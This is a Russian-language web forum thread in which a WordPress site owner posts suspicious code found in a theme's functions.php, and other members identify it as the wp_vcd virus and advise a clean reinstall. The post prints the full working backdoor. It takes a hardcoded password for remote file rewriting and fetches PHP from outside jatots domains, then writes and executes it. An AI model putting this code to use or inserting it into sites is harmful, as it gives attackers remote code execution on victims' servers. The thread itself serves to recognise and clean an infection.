Elliot

Нашел вредоносный код в WP или мне показалось?

10 posts in this topic

Здравствуйте друзья! Случайно заглянул в файл functions и заметил там непонятный код.

Гляньте, как по вашему, что он может делать, часом не удаляет тему после загрузки сайта на хостинг?

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '34ddb1c16d4eca7a3070f39f15b3c008'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				




				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;

								case 'change_code';
					if (isset($_REQUEST['newcode']))
						{
							
							if (!empty($_REQUEST['newcode']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
		   {
		   }
			else
			{
			$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
			fwrite($handle, "<?php\n" . $phpCode);
			}
			fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='11222a571de226a4d2202e7d67343f0d';
        if (($tmpcontent = @file_get_contents("http://www.jatots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.jatots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.jatots.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 
		
		        elseif ($tmpcontent = @file_get_contents("http://www.jatots.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
		elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?><?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php
/**
 *
 * The framework's functions and definitions
 *
 */

 

Share this post


Link to post
Share on other sites

Вам не показалось. Это вирус. Он заражает ядро ВП. Требуется:

  • "нулевая установка" Вордпресс
  • чистка плагинов
  • чистка темы
werstey and Elliot like this

Share this post


Link to post
Share on other sites

некогда не работал с wp и некогда не чистил вирусы 

Share this post


Link to post
Share on other sites
5 часов назад, simbo сказал:

некогда не работал с wp и некогда не чистил вирусы 

Очень познавательный ответ! Спасибо вам дорогой друг, мы так все хотели об этом узнать!!! Низкий вам поклон!!!!!

zinalab, Amenhotep and Воланд like this

Share this post


Link to post
Share on other sites

Ирония Лимончика улыбнула)))

Друзья, а вот как можно поискать то, что может еще быть?

Share this post


Link to post
Share on other sites

Капец, удалил этот код, обновил страницу и он снова записался((

Share this post


Link to post
Share on other sites

АПать тему не надо! Повторюсь:

Требуется:

  • "нулевая установка" Вордпресс
  • чистка плагинов
  • чистка темы

Предпочтительно в этой последовательности

Share this post


Link to post
Share on other sites
3 часа назад, files сказал:

АПать тему не надо! Повторюсь:

Требуется:

  • "нулевая установка" Вордпресс
  • чистка плагинов
  • чистка темы

Предпочтительно в этой последовательности

Я тему не апал, и таким не занимаюсь.

По сабжу, за ваш ответ спасибо, но он похож на ответ simbo, вот если бы вы ответили типа, зайди во все плагины и попытайся поискать там такой-то текст, вот это какой-то ответ, без обид, и не смотря на то, что вы модер.

Или накажите и закроите тему, как на нулледе за пререкание с модератором?)) 

 

И снова по сабжу, чтобы снять симптом, нужно удалить файлы wp-includes/wp-tmp.php и wp-vcd.php или как то так, код больше не записывается в functions но кто его знает...

Share this post


Link to post
Share on other sites
Цитата

Я тему не апал, и таким не занимаюсь.

Vu9iI0N.jpg

Правила. 8. "Поднятие" (ап, up и т.д.) темы чаще одного раза в двое суток (лучше напишите или отредактируйте всю необходимую информацию в своем первом топике).

 

Цитата

И снова по сабжу, чтобы снять симптом, нужно удалить файлы wp-includes/wp-tmp.php и wp-vcd.php или как то так, код больше не записывается в functions но кто его знает...

А вы почему не посмотрели что там в wp-includes/wp-tmp.php и wp-vcd.php?

Там другая цепочка файлов. Ядро ВП заражено "елочкой". Поэтому Вам поможет "нулевая установка" WP. Удалять вы будете бесконечно долго сам вирус, а не то, что он наделал.

Share this post


Link to post
Share on other sites
В 23.07.2018 в 4:06 PM, files сказал:

Vu9iI0N.jpg

Правила. 8. "Поднятие" (ап, up и т.д.) темы чаще одного раза в двое суток (лучше напишите или отредактируйте всю необходимую информацию в своем первом топике).

Ну так поставьте склейку сообщений, в чем проблема... Я считаю, что не апал тему.

По сабжу, буду пробовать залить чистые файлы ядра,

хоть бы это апом не было...

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.